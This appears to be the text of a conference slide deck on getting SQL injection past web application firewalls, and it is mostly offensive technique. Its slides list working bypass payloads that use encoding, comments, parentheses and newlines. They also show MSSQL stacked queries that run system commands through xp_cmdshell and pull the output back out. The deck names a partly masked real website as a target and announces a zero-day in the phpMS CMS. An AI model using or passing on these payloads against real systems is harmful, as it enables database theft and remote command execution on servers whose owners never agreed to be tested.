2. • Got Listed at ebay and
Microsoft security
Researchers List
• Worked as free lance security
researcher for tech2.in.com
and in.com
• Found SQLi vulnerabilities
at kerala enterance portal
website
• http://tech2.in.com/news/gene
ral/updated-serious-
vulnerability-affects-kerala-
common-entrance-exams-
portal/369982
• Basically the InfoSec
Researcher Guy
3. Strictly waf based and Real Life Based Scenarious
MsSql Stack Based Queries(thought it as a good addon)
A PHP-MS 0-DAY
4. First among the OWASP TOP 10 vulnerabilities
Used for gaining access to sql database and hence the b0x
Mainly of 5 types
Union based
Error based
X-path based
Blind and Time based
Double Query based
5. So whats the catch here!!!
Pentesting real life scenarious is much difficult
than ever
Sqli has been patched and firewalls, IDS and IPS
installed everywhere
Exploiting Sqli has been difficult and tools has
disappointed to !
6. Ofcourse Failure of Sqlmap !!!
Failure of Havij which by the way is always a
failure :p
IDS , IPS and other firewall family
Apache security modules
mod_sec,htmlentities,mysql_escape,magic_quotes
and all my dear appsec modules
7. What are they !!?
Well we need to overcome the situation that has
come rather than site and lament over it
Here will focusing on the real life scenarious where
the tools fail and much of our human hard work
comes in
8. Preg_match is a comparer statement used in php
Mainly deployed by small scale waf’s
Poorly coded ones the easier an example
9. Used when “select” + any case letters are blocked
'select'+'(A-Za-z)‘
So any letter after select gets filtered out
Solution
Mysql has an option called stored variable procedure
“@” is a sign that can be used as a prefix, that denotes
stored procedure, function parameter names, and
variables names.
10. So how do we do it?
Union select 1,2,3 - - = 403 Forbidden
So It changes to
and (@:=version()) union select 1,@,3- - = bypassed
11. So whats the Catch here
Most of us love the dork inurl:php?id= site:blah.com
So what has happened most admins have changed the id=
parameters to within the url and making the tools go wreckless
and n00bs go mad
An example would be the usuall way was
site.com/index.php?id= ,now they have gone on and changed to
site.com/index-goods-12.html
An example site that has no point of injection at the first sight
Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-
suis-prete,884.html
12.
13. Usual commenting style should be followed here ie the “- -”
other wise other forms like %23(#) and /* could cause the
browser to misinterpret the statement as a comment
hence commenting out the rest and not letting it read the
.html part
In most cases encountered these type of injections, there
are white spaces which often cause a havoc and nightmare
for scanners
14. Well dealing with white spaces depends on different scenarios
U could use the traditional commenting style like
id=3/**/union/**/select 1,2,3 or
Well the problem is /**/ might be filtered in some cases
So we use the ()which is the same as executing the query
id=(2)union(select(1),2,3)
NB:During html based injections it is better to use the
paranthesis
15. Based on Error 1222
Came across CTF’s where the answer had to be in normal
union based .
Most tools fails here since the vulnerable column is being
parsed in between the html tags.
Usually union statements are being provided here but the
columns do not get displayed.
So what do we do ?
Plse don’t say we look over the source because ur not gonna
find anything at the first shot
16.
17. We do this by changing the traditional union select 1,2,3 to
union select 1111,2222,3333
This helps us to search in the source but still nt available
on screen.
18. If u could like to display it on screen u could use
concat or group_concat functions and using html inside
them
Use hex of html if the quotes are blocked due to magic
quotes
Here we could see the version on closing the “</title>” tag
since the vulnerable column was being displayed within
the title block
19. Bypassing errors 400/403/404/406
//convert(group_concat(schema_name) using ascii) from
information_schema.schemata - -
C-style Commenting : /*!Union*/+/*!Select*/
//apart from the original source commenting the ! Executes the
command
Character Encoding :Bypasses filters like 400
%55nion/**/%53elect
Sub queries : Union (select 1,2,3)
//Where most WAF’s fail out
20. id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a
// # is comment but the %0A bypasses with the new line so the statements gets
executed
Bypassing Error 1064
Usually related with blocking of white spaces
id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
// the queries are supplied in parenthesis so as to forbid the use of white
spaces
“/**/ “Commenting also possible
Bypassing Error 500
and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+
// WAFs that written in the C language prone to overflow or act differently
when loaded with a bunch of data.
Give a large amount of data allows our code executing
21. Stacked queries mainly available in mssql and postgresql
servers
Underlying process is simple if chmdshell options are
enable then u are in
Stacked Queries Support is Checked on Server using
'WAITFOR DELAY hour:min:sec’
For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-
- - would check whether cmdshell is enabled or nt
depending upon time lag.
24. Just to prove that still this exists a Real Life – demo
25. http://www.site.com/security.asp?vulnID=123;; CREATE
TABLE funkyfresh (data varchar(8000));--
// Creates the table funkyfresh
http://www.site.com/security.asp?vulnID=123;; DECLARE
@funky varchar(4000); SET @funky=0x77686f616d69; INSERT
INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -
// WE declare a variable @funky and store it with hex equi. Of
the code
NOTE: 0x77686f616d69 => 'whoami‘
26. /!*AND*/
5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+C
HAR(105)+CHAR(93)+(SELECT TOP 1
SUBSTRING((ISNULL(CAST(data AS
NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE
ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1
ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM
funkyfresh ORDER BY data) ORDER BY
data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHA
R(93)))
// Creadits to Bernardo's original write-up from BlackHat
//The reason I took it although a bit complicated works for no reason
seamlessly
Read the temp table to get the results and you need to make sure you
deal with same data type when you do...
27.
28. 0-day by me
phpMS - a free CMS (content management system),
Designed for rapid development and support of web-projects of any
complexity.
Features CMS phpMS:
Easy to install;
Multi-level menus;
Arbitrary arrangement of blocks;
Simple module development;
Access rights